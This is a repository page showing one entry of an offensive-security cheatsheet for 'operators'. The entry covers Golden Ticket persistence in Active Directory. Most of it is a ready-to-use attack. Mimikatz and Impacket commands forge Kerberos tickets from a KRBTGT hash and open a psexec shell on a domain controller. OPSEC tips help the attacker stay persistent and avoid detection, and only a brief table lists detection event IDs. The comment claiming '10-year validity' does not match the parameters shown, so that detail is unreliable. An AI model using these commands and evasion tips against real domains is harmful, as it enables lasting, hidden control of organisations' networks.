daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

attack-64-golden-ticket-persistence.md (3059B)


      1 ---
      2 title: "Attack #64 β€” Golden Ticket Persistence"
      3 description: "A Golden Ticket provides persistent domain access by forging TGTs using the KRBTGT hash. As a persistence technique (not just one-time escalation), the…"
      4 category: active-directory
      5 subcategory: "Persistence"
      6 tags: ["active-directory", "kerberos", "adcs", "credential-access", "persistence"]
      7 tools: ["Impacket", "Mimikatz", "PowerShell"]
      8 difficulty: advanced
      9 updated: "2026-08-10"
     10 source: "vault:ActiveDirectory/AD-Attack/Category-Eight/🟀 Attack #64 β€” Golden Ticket Persistence.md"
     11 ---
     12 # 🟀 Attack #64 β€” Golden Ticket Persistence
     13 
     14 ***
     15 
     16 ## πŸ“– How It Works
     17 
     18 A Golden Ticket provides **persistent domain access** by forging TGTs using the KRBTGT hash. As a persistence technique (not just one-time escalation), the attacker stores the KRBTGT hash offline and forges new TGTs whenever needed β€” maintaining access even if the compromised DA account's password is reset. Only a **double KRBTGT password rotation** invalidates existing Golden Tickets.
     19 
     20 ***
     21 
     22 ## βš™οΈ Prerequisites
     23 
     24 | Requirement | Detail |
     25 |---|---|
     26 | **KRBTGT hash** | Previously extracted via DCSync |
     27 | **Domain SID** | For ticket crafting |
     28 
     29 ***
     30 
     31 ## πŸ’» Full Commands
     32 
     33 ```powershell
     34 # ── Forge Golden Ticket for persistent access ─────────────────────────────────
     35 mimikatz.exe
     36 kerberos::golden /user:Administrator /domain:corp.local \
     37   /sid:S-1-5-21-3878595448-1012506728-1948843120 \
     38   /krbtgt:1a2b3c4d5e6f7a8b9c0d1e2f3a4b5c6d \
     39   /ptt
     40 
     41 # ── With 10-year validity ────────────────────────────────────────────────────
     42 kerberos::golden /user:Administrator /domain:corp.local \
     43   /sid:S-1-5-21-3878595448-1012506728-1948843120 \
     44   /krbtgt:1a2b3c4d5e6f7a8b9c0d1e2f3a4b5c6d \
     45   /startoffset:-10 /endin:43200 /renewmax:86400 /ptt
     46 ```
     47 
     48 ```bash
     49 # ── Impacket β€” forge and save Golden Ticket ───────────────────────────────────
     50 ticketer.py -nthash 1a2b3c4d5e6f7a8b9c0d1e2f3a4b5c6d \
     51   -domain-sid S-1-5-21-3878595448-1012506728-1948843120 \
     52   -domain corp.local Administrator
     53 
     54 export KRB5CCNAME=Administrator.ccache
     55 psexec.py -k -no-pass corp.local/Administrator@DC01.corp.local
     56 ```
     57 
     58 ***
     59 
     60 ## 🎯 OPSEC Tips
     61 
     62 - **Store KRBTGT hash securely** β€” it's the key to unlimited domain access
     63 - **Forge tickets as needed** β€” don't use a single Golden Ticket continuously
     64 - **Use Diamond (#13) or Sapphire (#14) Tickets** for better OPSEC
     65 - **Only invalidated by**: KRBTGT password reset **twice** (to clear both current and previous keys)
     66 
     67 ***
     68 
     69 ## πŸ›‘οΈ Detection β€” Event IDs
     70 
     71 | Event ID | Source | What to Look For |
     72 |---|---|---|
     73 | **4769** | Security Log (DC) | TGS request with no corresponding 4768 AS-REQ |
     74 | **4624** | Security Log | DA logon from unexpected source with no prior TGT event |
     75 
     76 ***
     77 
     78 > βœ… **Attack #64 β€” Golden Ticket Persistence complete.**